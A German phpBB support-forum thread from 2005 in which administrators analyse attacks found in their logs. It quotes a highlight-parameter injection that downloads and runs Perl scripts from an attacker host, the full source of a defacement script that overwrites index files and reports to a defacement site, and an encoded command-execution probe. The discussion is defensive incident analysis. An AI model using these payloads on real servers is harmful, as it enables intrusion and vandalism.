Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
albe
Mitglied
Beiträge: 128 Registriert: 08.02.2004 00:15
Wohnort: Hamburg
Beitrag
von albe » 05.07.2005 15:16
Ich hatte heute einen neuen Angriff:
Code: Alles auswählen
/phpBB2/viewtopic.php?t=376&highlight=\'.system(\'ls%09/;cd%09/tmp;wget%09www.spykids.info/po.txt;perl%09po.txt;wget%09www.spykids.info/putz.1.txt;perl%09putz.1.txt\').\'
und dieses Skript wurd dann aufgerufen:
Code: Alles auswählen
#!/usr/bin/perl
$arquivo = $0;
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
use IO::Socket::INET;
`find / -name index.* >> bah`;
open(a,"<bah");
@dir = <a>;
close(a);
$b = scalar(@dir);
for($a=0;$a<=$b;$a++)
{
chomp $dir[$a];
system("echo spykids spykids > $dir[$a]");
}
`locate httpd.conf >> porra`;
open(a,"<porra");
@po = <a>;
close(a);
foreach $po (@po){
chomp $po;
`cat $po |grep ServerName >> bah1`;
}
open(a,"<bah1");
@site = <a>;
close(a);
$b = scalar(@site);
for($a=0;$a<=$b;$a++)
{
chomp $site[$a];
$site[$a] =~ s/#//g;
$site[$a] =~ s/servername//g;
$site[$a] =~ s/ServerName//g;
$site[$a] =~ s/ //g;
$sock = IO::Socket::INET->new(PeerAddr => $site[$a], PeerPort => 80, Proto => "tcp") or next;
print $sock "GET / HTTP/1.0\n\n";
@ow = <$sock>;
close($sock);
$ae = "";
$ae = "@ow";
if($ae =~/spykids/){
print "$site[$a]\n";
$sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or die "nao conectou";
print $sock "POST /en/defacements/notify HTTP/1.0\r\n";
print $sock "Accept: */*\r\n";
print $sock "Referer: http://www.zone-h.org/en/defacements/notify\r\n";
print $sock "Accept-Language: pt-br\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
print $sock "Host: www.zone-h.org\r\n";
print $sock "Content-Length: 385\r\n";
print $sock "Pragma: no-cache\r\n";
print $sock "\r\n";
print $sock "notify_defacer=SpyKids¬ify_domain=http%3A%2F%2F$site[$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n";
close($sock);
}
}
system("rm -rf $arquivo");
Weiss jemand von Euch was dieses Skript bezweckt?
kellanved
Mitglied
Beiträge: 570 Registriert: 05.02.2005 15:15
Wohnort: Berlin
Beitrag
von kellanved » 05.07.2005 17:05
Sieht aus wie ein modifizierter Santy. Allerdings sucht er nicht nach anderen phpBBs, sondern meldet den Erfolg an eine Defacement-Seite. Die Details sind mir im Moment zu anstrengend (Portugiesisch + Perl...)
Es wurde auch noch dieses Script gestartet (sieht wie ein IRC Bot aus):
http://www.spykids.info/po.txt
albe
Mitglied
Beiträge: 128 Registriert: 08.02.2004 00:15
Wohnort: Hamburg
Beitrag
von albe » 05.07.2005 18:22
Ich habe nun meine htaccess entsprechend angepasst. Bei Eingabe des Codes wird der Angreifer nun weitergeleitet....
kellanved
Mitglied
Beiträge: 570 Registriert: 05.02.2005 15:15
Wohnort: Berlin
Beitrag
von kellanved » 05.07.2005 18:41
eine andere Frage: war der Angriff erfolgreich?
Falls ja, empfielt sich eine gründliche Reinigung des tmp- Verzeichnisses und ein Neustart des Servers, um den IRC-Spybot los zu werden.
albe
Mitglied
Beiträge: 128 Registriert: 08.02.2004 00:15
Wohnort: Hamburg
Beitrag
von albe » 05.07.2005 21:53
Hallo,
nein war nicht erfolgreich, der Angriff wurde abgeblockt. Ich habe u.a. den CBACK CrackerTracker drauf.
Was ist ein IRC-Spybot? Was macht der?
kellanved
Mitglied
Beiträge: 570 Registriert: 05.02.2005 15:15
Wohnort: Berlin
Beitrag
von kellanved » 05.07.2005 22:13
Ein Programm welches es erlaubt den Server über IRC fernzusteuern. Etwa um andere Rechner zu hacken oder DOS-Attacken zu starten.
Basilisk
Mitglied
Beiträge: 23 Registriert: 16.05.2005 11:06
Beitrag
von Basilisk » 05.07.2005 23:41
Hallo,
Also mein Virenscanner "Nod32" erkennt deine Textdatei als :
Trojan Unix Shell/bot.A
KAV sagt dazu: Backdoor.Perl.Shellbot.o
Ich würde sie vom Netz nehmen
Grüsse
Basilisk
kellanved
Mitglied
Beiträge: 570 Registriert: 05.02.2005 15:15
Wohnort: Berlin
Beitrag
von kellanved » 05.07.2005 23:44
Wenn sich das auf den Link weiter oben bezieht: das ist nur aus dem Post von albe herausgeschnitten. Die Datei liegt auf dem Server der Hacker.
Jürgen H.
Mitglied
Beiträge: 192 Registriert: 01.06.2003 23:13
Beitrag
von Jürgen H. » 08.07.2005 13:28
Hallo,
Code: Alles auswählen
t=9955&highlight=%27.printf(chr(60).chr(103).chr(48).chr(62)).system(chr(105).chr(100)).printf(chr(60).chr(47).chr(103).chr(48).chr(62)).%27
209.95.20.2 Python-urllib/2.1
Was war das denn
?
Hatte ich noch nie im Logfile...
Lg
Jürgen
kellanved
Mitglied
Beiträge: 570 Registriert: 05.02.2005 15:15
Wohnort: Berlin
Beitrag
von kellanved » 08.07.2005 13:40
Das hier:
Das ist ein Versuch den 2.0.15er Exploit auszunutzen. Ausserdem ein schönes Beispiel, warum Security Mod und Konsorten nicht funktionieren können.